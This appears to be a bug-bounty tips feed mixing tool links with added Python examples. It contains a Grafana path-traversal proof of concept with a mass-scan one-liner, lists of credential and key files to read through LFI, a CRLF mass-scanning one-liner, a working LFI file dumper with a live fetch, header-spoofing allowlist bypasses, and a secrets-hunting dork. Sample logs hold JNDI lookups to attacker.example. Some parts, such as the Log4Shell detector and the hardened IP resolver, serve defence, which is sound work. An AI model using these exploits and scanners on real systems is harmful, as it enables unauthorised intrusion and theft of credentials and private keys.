Webapp Wordlists
This repository contains wordlists for each version of common web applications and content management systems (CMS). Each version has its own wordlist of all the files and directories shipped in that release, so once you have fingerprinted the exact version you can brute-force paths that actually exist instead of a generic list.
https://github.com/p0dalirius/webapp-wordlists
#wordlist #cms #bugbounty
KeyHacks
KeyHacks is a repository that shows quick ways to check whether an API key leaked in a bug bounty program is still valid, usually a single curl call against the provider's own API.
https://github.com/streaak/keyhacks
#api #key #check #bugbounty
Grafana — Unauthorized Arbitrary File Read
Path traversal in Grafana's plugin asset endpoint (CVE-2021-43798), disclosed as an unpatched 0day and actively exploited. It affects only Grafana 8.x: 8.0.0-beta1 through 8.3.0, fixed in 8.3.1 (backported to 8.0.7, 8.1.8 and 8.2.7).
Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana
PoC:
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini
The plugin id ("grafana-clock-panel" above) can be any plugin installed on the instance; built-in panels such as "graph" exist on every install. grafana.ini is a good first read because it may hold the [security] admin_password and secret_key settings.
Send the path verbatim: curl and browsers collapse "../" segments before the request leaves the client, so use curl --path-as-is or a client that does not normalise the path.
One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd" -mc 200 -ms 'root:x:0:0'
#grafana #lfi #bugbounty #pentest
ipsourcebypass
This Python script tries to bypass IP source restrictions (allowlists) by sending the spoofed address in the HTTP headers that applications and reverse proxies consult for the client IP, such as X-Forwarded-For and X-Real-IP.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
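What the tool is actually probing, as an added example (not ipsourcebypass's own code): a naive allowlist check that believes any client-IP hint header, beside a hardened check that honours X-Forwarded-For only when the TCP peer is a known reverse proxy. The header list, allowlist, trusted proxy and test addresses are assumptions chosen for the demo.

```python
"""Client-IP spoofing through HTTP headers: vulnerable check vs hardened check.

Added example, not code from ipsourcebypass. IP_HEADERS, ALLOWLIST,
TRUSTED_PROXIES and the peer/spoof addresses are assumptions for the demo.
"""
import ipaddress

# Headers that apps, frameworks and WAFs commonly read to learn the "real" client IP.
IP_HEADERS = [
    "X-Forwarded-For", "X-Real-IP", "X-Originating-IP", "X-Remote-IP",
    "X-Remote-Addr", "X-Client-IP", "Client-IP", "True-Client-IP",
    "X-Forwarded", "Forwarded-For", "Forwarded", "CF-Connecting-IP",
    "X-Cluster-Client-IP", "X-ProxyUser-Ip", "Via",
]

ALLOWLIST = [ipaddress.ip_network("127.0.0.1/32"), ipaddress.ip_network("10.0.0.0/8")]
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.5/32")]   # the only box allowed to set XFF


def bypass_header_sets(spoof_ip="127.0.0.1"):
    """One header dict per candidate, the way a probing tool sends them."""
    for name in IP_HEADERS:
        value = f"for={spoof_ip}" if name == "Forwarded" else spoof_ip   # RFC 7239 syntax
        yield {name: value}


def _norm(headers):
    return {k.lower(): v for k, v in headers.items()}


def client_ip_naive(peer_ip, headers):
    """Vulnerable: returns the first IP hint found in any header, else the peer."""
    h = _norm(headers)
    for name in IP_HEADERS:
        value = h.get(name.lower())
        if not value:
            continue
        if name == "Forwarded":                       # Forwarded: for=1.2.3.4;proto=https
            for part in value.split(";"):
                if part.strip().lower().startswith("for="):
                    value = part.split("=", 1)[1].strip('"[]')
        return value.split(",")[0].strip()
    return peer_ip


def client_ip_hardened(peer_ip, headers):
    """Ignores every hint header unless the TCP peer is a trusted proxy, and then
    takes the rightmost X-Forwarded-For hop that is not itself a trusted proxy
    (the address the proxy appended), so a client-supplied leading entry is ignored."""
    peer = ipaddress.ip_address(peer_ip)
    if not any(peer in net for net in TRUSTED_PROXIES):
        return peer_ip
    hops = [x.strip() for x in _norm(headers).get("x-forwarded-for", "").split(",") if x.strip()]
    for hop in reversed(hops):
        try:
            if not any(ipaddress.ip_address(hop) in net for net in TRUSTED_PROXIES):
                return hop
        except ValueError:                            # garbage in XFF: fall back to the peer
            return peer_ip
    return peer_ip


def is_allowed(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWLIST)


def probe(resolver, peer_ip="203.0.113.7", spoof_ip="127.0.0.1"):
    """Names of the headers that get an external peer through the allowlist."""
    return [next(iter(h)) for h in bypass_header_sets(spoof_ip)
            if is_allowed(resolver(peer_ip, h))]


if __name__ == "__main__":
    print("naive   :", probe(client_ip_naive))      # every header works
    print("hardened:", probe(client_ip_hardened))   # nothing works from an untrusted peer
```

The hardened resolver shows the fix you should recommend in the report: identify the client from the socket peer, and parse X-Forwarded-For only when that peer is your own proxy, walking it from the right.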
Log4Shell — Quick Guide
https://musana.net/2021/12/13/log4shell-Quick-Guide/
#log4j #waf #bypass #bugbounty
Bug Bounty Tip — Log4j Vulnerability Cheatsheet
— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)
#log4j #cheatsheet #bugbounty
Osmedeus
Fully automated offensive security framework for reconnaissance and vulnerability scanning
Features
— Subdomain Scan.
— Subdomain TakeOver Scan.
— Screenshot the target.
— Basic recon like Whois, Dig info.
— Web Technology detection.
— IP Discovery.
— CORS Scan.
— SSL Scan.
— Wayback Machine Discovery.
— URL Discovery.
— Headers Scan.
— Port Scan.
— Vulnerability scan.
— Separate workspaces to store all scan output and detailed logging.
— REST API.
— React Web UI.
— Support Continuous Scan.
— Slack notifications.
— Easily view reports from the command line.
https://github.com/j3ssie/Osmedeus
#osint #vulnerability #scanner #bugbounty
API Guesser
A simple website to guess API Key / OAuth Token
When you do a pentest or GitHub recon and find an API key or OAuth token but don't know which service it belongs to, you can use my website, built in JavaScript, to guess it from the token's format.
https://api-guesser.netlify.app
Source:
https://github.com/daffainfo/apiguesser-web
#api #token #osint #bugbounty
Finding Sensitive Files for BugBounty
Paths worth requesting through a path traversal or LFI on a Linux target:
— /proc/self/cwd/index.php
— /proc/self/cwd/main.py
— /etc/motd
— /proc/net/udp
— /proc/net/arp
— /proc/self/environ
— /var/run/secrets/kubernetes.io/serviceaccount
— /proc/cmdline
— /proc/mounts
— /etc/mysql/my.cnf
— /proc/sched_debug
— /home/user/.bash_history
— /home/user/.ssh/id_rsa
/proc/self/cwd resolves to the working directory of the process serving your request, so it reaches the application source without knowing the webroot, and /proc/self/environ exposes that process's environment variables, which often carry database credentials and API keys. The Kubernetes path is a directory: read token, ca.crt and namespace inside it.
#sensitive #files #bugbounty #bugbountytips
Log4j — WAF and Patches Bypass Tricks
https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
#log4j #waf #bypass #bugbounty
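The flip side of the bypass list, for the Log4Shell guide and cheatsheet above as well as this one: a detection that survives the tricks. This is an added example, not code from the linked repository or guides. It resolves the Log4j lookup obfuscations the bypass words rely on (nested ${lower:} and ${upper:}, ${::-x} and ${env:X:-x} default values, ${date:'x'} literals, URL-encoding layers) inside-out until the text stops changing, then applies one signature to the normalised result. The log lines are constructed.

```python
"""Normalise obfuscated Log4Shell (CVE-2021-44228) payloads before matching.

Added example, not code from the linked repository or guides. The transforms
below are the Log4j 2.x lookups used in published WAF bypasses; SAMPLE_LOGS
are constructed access-log lines.
"""
import re
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")                 # a lookup with nothing nested inside
DEFAULT_VALUE = re.compile(r"^[A-Za-z0-9]*:[^:]*:-(.*)$")  # ${::-x}, ${env:NOPE:-x}, ${sys:a.b:-x}
DATE_LITERAL = re.compile(r"^date:'([^']*)'$")             # ${date:'j'} prints the quoted text as-is
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def _resolve(m):
    """Replace one innermost lookup with the value Log4j would substitute for it."""
    body = m.group(1)
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    d = DATE_LITERAL.match(body)
    if d:
        return d.group(1)
    d = DEFAULT_VALUE.match(body)          # undefined lookup falls back to its default
    if d:
        return d.group(1)
    return m.group(0)                      # jndi:... or an unknown lookup: keep it for the signature


def normalise(text, max_rounds=20):
    prev = None
    while prev != text:                    # peel URL-encoding layers (%24%7B, %2524%257B, ...)
        prev, text = text, unquote(text)
    for _ in range(max_rounds):            # resolve inside-out until nothing changes
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def find_log4shell(lines):
    """Return (original_line, normalised_payload) for every line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        norm = normalise(line)
        m = JNDI.search(norm)
        if m:
            stop = norm.find("}", m.end())
            stop = len(norm) if stop == -1 else stop + 1
            hits.append((line, norm[m.start():stop]))
    return hits


# Constructed log lines: plain payload, case/default-value tricks, double-encoded
# query string, a benign ${date:} lookup, and a mixed k8s/sys default-value form.
SAMPLE_LOGS = [
    '10.0.0.1 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.2 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}${::-d}i:${lower:L}dap://attacker.example/a}"',
    '10.0.0.3 - - "GET /?x=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 400',
    '10.0.0.4 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 ${date:yyyy}"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${j${k8s:k5:-ND}i:${sys:java.version:-l}da${::-p}://x/a}"',
]

if __name__ == "__main__":
    for line, payload in find_log4shell(SAMPLE_LOGS):
        print(line.split()[0], "->", payload)
```

Matching on the normalised text rather than the raw line is what keeps the rule stable: every new spelling of "jndi" the bypass list adds is just another lookup to resolve, not another regex to maintain.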
CRLF OneLiner
A simple Bash one-liner that automates CRLF injection scanning. It is a practical helper for bug hunters: it tries every payload from crlf_payloads.txt against every host in subdomains.txt and reports the ones where an injected Set-Cookie header comes back in the response, with no tool beyond curl and grep. Replace the entries in subdomains.txt with the URLs you want to target, paste the command into your terminal and wait.
Bash OneLiner:
input='CRLF-one-liner/subdomains.txt'; while IFS= read -r target; do cat CRLF-one-liner/crlf_payloads.txt | xargs -I % sh -c "curl -vs --max-time 9 '$target/%' 2>&1 | grep -qi '^< Set-Cookie: *crlf' && echo '$target [+] is vulnerable with payload: %' >> crlf_results.txt || echo '[-] Not vulnerable: $target'"; done < "$input"
The grep only looks at curl's "< " response-header lines, so a page that merely reflects the payload in its body is not reported. xargs substitutes each payload textually into the sh -c string, so keep the payload file as published and free of shell metacharacters.
crlf_payloads.txt: https://raw.githubusercontent.com/kleiton0x00/CRLF-one-liner/master/crlf_payloads.txt
#crlf #bash #oneliner #bugbounty
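The same check done properly, as an added example that is not the one-liner's code: the line-break encodings worth trying in front of a marker header, and a response parser that reports the marker only when it came back as a real header rather than reflected in a header value or the body (the false positive a body-wide grep would hit). The live check uses http.client because it sends the path verbatim. The three sample responses are constructed.

```python
"""CRLF injection check: payload variants and response analysis.

Added example, not the one-liner's own code. VULN, SAFE_REFLECTED and
SAFE_ENCODED are constructed HTTP responses; check_url() is the live step.
"""
import http.client
import re
from urllib.parse import urlsplit

MARKER = ("set-cookie", "crlf=injection")   # header the payload tries to inject


def crlf_payloads(prefix=""):
    """Line-break encodings to try, each followed by the marker header."""
    breaks = [
        "%0d%0a", "%0a", "%0d",            # CRLF, bare LF, bare CR
        "%250d%250a",                      # double-encoded, for a second decode step downstream
        "%E5%98%8A%E5%98%8D",              # U+560A U+560D: some Unicode-to-Latin1 paths map them to CR LF
        "%u000d%u000a",                    # %u encoding accepted by a few legacy parsers
        "\\r\\n",                          # literal backslash sequences, for template-style decoders
    ]
    return [f"{prefix}{b}Set-Cookie:{MARKER[1]}" for b in breaks]


def injected_from_pairs(headers):
    """headers: iterable of (name, value). Return the marker headers actually present."""
    return [(n, v) for n, v in headers
            if n.strip().lower() == MARKER[0] and v.strip().lower().startswith(MARKER[1])]


def injected_headers(raw: bytes):
    """Parse a raw response; only the header block is inspected, never the body."""
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    pairs = []
    for line in re.split(rb"\r?\n", head)[1:]:        # skip the status line
        name, sep, value = line.partition(b":")
        if sep:
            pairs.append((name.decode("latin-1"), value.decode("latin-1")))
    return injected_from_pairs(pairs)


def is_vulnerable(raw: bytes) -> bool:
    return bool(injected_headers(raw))


def check_url(url, timeout=9):
    """Live check of one payload URL (not run by the test). Returns the injected headers.
    http.client sends the path as given; it refuses a raw CR/LF, so keep payloads encoded."""
    u = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port, timeout=timeout)
    path = (u.path or "/") + (f"?{u.query}" if u.query else "")
    conn.request("GET", path)
    try:
        return injected_from_pairs(conn.getresponse().getheaders())
    finally:
        conn.close()


# Constructed responses: a real injected header, a body reflection, an encoded reflection.
VULN = (b"HTTP/1.1 302 Found\r\nLocation: /?next=\r\nSet-Cookie:crlf=injection\r\n"
        b"Content-Length: 0\r\n\r\n")
SAFE_REFLECTED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                  b"<p>%0d%0aSet-Cookie:crlf=injection</p>")
SAFE_ENCODED = (b"HTTP/1.1 302 Found\r\nLocation: /?next=%0D%0ASet-Cookie:crlf=injection\r\n"
                b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for name, raw in [("VULN", VULN), ("SAFE_REFLECTED", SAFE_REFLECTED), ("SAFE_ENCODED", SAFE_ENCODED)]:
        print(name, injected_headers(raw))
    print(crlf_payloads("/?next="))
```

Usage against a target is `check_url("http://target" + payload)` for each entry of `crlf_payloads("/?next=")`; a non-empty return is the finding, and the injected header pair is the evidence for the report.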
LFIDump
A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.
https://github.com/p0dalirius/LFIDump
#lfi #dump #tools #bugbounty
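The loop such a dumper runs, as an added example that is not LFIDump's code: for each target file try the absolute path and then ../ ladders in plain and encoded forms, and keep the first response that differs from the server's "not found" baseline. The probe takes any fetch(path) -> bytes callable; http_fetch() builds one over a real URL template, and fake_fetch() is a constructed in-memory stand-in for a vulnerable include($_GET['page']) so the example runs offline. The file list extends the "Finding Sensitive Files" list above with the token file inside the Kubernetes service-account directory.

```python
"""Dump files through a path-traversal / LFI parameter, filtering by baseline.

Added example, not LFIDump's code. FAKE_FS, FAKE_WEBROOT and fake_fetch() are a
constructed vulnerable target used only to run the logic offline.
"""
import posixpath
import urllib.error
import urllib.request
from urllib.parse import quote

SENSITIVE = [
    "/etc/passwd", "/proc/self/cwd/index.php", "/proc/self/environ", "/proc/cmdline",
    "/var/run/secrets/kubernetes.io/serviceaccount/token",
    "/etc/mysql/my.cnf", "/home/user/.ssh/id_rsa",
]


def traversal_candidates(path, max_depth=8):
    """The target as an absolute path, then ../ ladders in plain and encoded forms."""
    rel = path.lstrip("/")
    yield path
    for depth in range(1, max_depth + 1):
        yield "../" * depth + rel
        yield "..%2f" * depth + rel        # for apps that decode once more after their checks
        yield "%2e%2e/" * depth + rel


def dump(fetch, targets=SENSITIVE, max_depth=8):
    """Return {target: (working_payload, content)} for every file that could be read.
    The response for a file that cannot exist is the baseline; anything different
    and non-empty is treated as real file content."""
    baseline = fetch("/definitely_missing_" + "x" * 12)
    found = {}
    for target in targets:
        for cand in traversal_candidates(target, max_depth):
            body = fetch(cand)
            if body and body != baseline:
                found[target] = (cand, body)
                break
    return found


def http_fetch(url_template, timeout=10):
    """url_template holds FUZZ, e.g. 'http://target/index.php?page=FUZZ'. Live; not run by the test."""
    def fetch(path):
        url = url_template.replace("FUZZ", quote(path, safe="/%"))   # keep pre-encoded %2f intact
        try:
            with urllib.request.urlopen(url, timeout=timeout) as r:
                return r.read()
        except urllib.error.HTTPError as e:
            return e.read()                 # a 404/500 page is still a useful baseline
        except urllib.error.URLError:
            return b""
    return fetch


# Constructed target: a PHP-style include that prefixes the parameter with its page
# directory, so only a plain ../ ladder deep enough to climb out reaches the real files.
FAKE_FS = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/proc/self/environ": b"PATH=/usr/bin\x00DB_PASSWORD=hunter2\x00",
    "/var/www/html/pages/home.php": b"<h1>home</h1>",
}
FAKE_WEBROOT = "/var/www/html/pages/"


def fake_fetch(path):
    full = posixpath.normpath(FAKE_WEBROOT + path)   # collapses real ../, not %2e%2e or ..%2f
    return FAKE_FS.get(full, b"Warning: include(): failed to open stream\n")


if __name__ == "__main__":
    for target, (payload, content) in dump(fake_fetch).items():
        print(f"{target:25} via {payload:35} {content[:40]!r}")
```

For a real run replace fake_fetch with `http_fetch("http://target/index.php?page=FUZZ")`; the baseline comparison is what separates a traversal that worked from an application that answers 200 with the same error page for everything.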
Google Groups Dork
Some devs use Google Groups as a workplace because it is easy and free, and a lot of sensitive information leaks there: access keys, AWS secrets and similar.
Dork:
site:groups.google.com "COMPANY"
Once a group turns up, narrow the search with a second term such as "password", "secret" or "AKIA".
#osint #dorks #bugbounty
The Bug Hunter Methodology
PDF:
https://www.ceos3c.com/wp-content/uploads/2020/06/Bug-Hunter-Methodology-V4-Visualization.pdf
#bugbounty #methodology #xmind
Wordlists
Dictionaries of attack patterns and primitives for black-box application fault injection and resource discovery.
https://github.com/fuzzdb-project/fuzzdb
https://github.com/Karanxa/Bug-Bounty-Wordlists
https://github.com/orwagodfather/WordList
https://wordlists.assetnote.io/
#wordlist #fuzzing #bugbounty
🤖 BBOT: OSINT automation for hackers
This tool can execute the entire OSINT process in a single command, including subdomain enumeration, port scanning, web screenshots (with its gowitness module), vulnerability scanning (with nuclei), and much more. BBOT currently has over 50 modules and counting.
Features:
— Recursive;
— Graphing;
— Modular;
— Multi-Target;
— Automatic Dependencies;
— Smart Dictionary Attacks;
— Scope Distance;
— Easily Configurable via YAML.
Blog:
https://blog.blacklanternsecurity.com/p/bbot
Source:
https://github.com/blacklanternsecurity/bbot
#external #recon #osint #redteam #bugbounty
Forwarded from Offensive Xwitter
😈 [ pdiscoveryio, ProjectDiscovery.io ]
The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris
https://t.co/2GY3QZlTft
#hackwithautomation #cybersecurity #infosec #bugbounty
🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/
🐥 [ tweet ]
⚔️ Katana — Web Crawler
A next-generation crawling and spidering framework.
Features:
— Standard/Headless
— Customizable Config
— JavaScript parsing
— Scope control
https://github.com/projectdiscovery/katana
#web #crawler #tools #bugbounty
Forwarded from Offensive Xwitter
😈 [ 0x0SojalSec, Md Ismail Šojal ]
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
get more detail about this👇
🔗 https://gist.github.com/0xSojalSec/5bee09c7035985ddc13fddb16f191075
#bugbountyTips #bugbounty
🐥 [ tweet ]
⚙️ Subdomain Generator
If you want to create subdomains quickly, try this site.
🔗 Source:
https://husseinphp.github.io/subdomain/
#subdomain #generator #bugbounty #web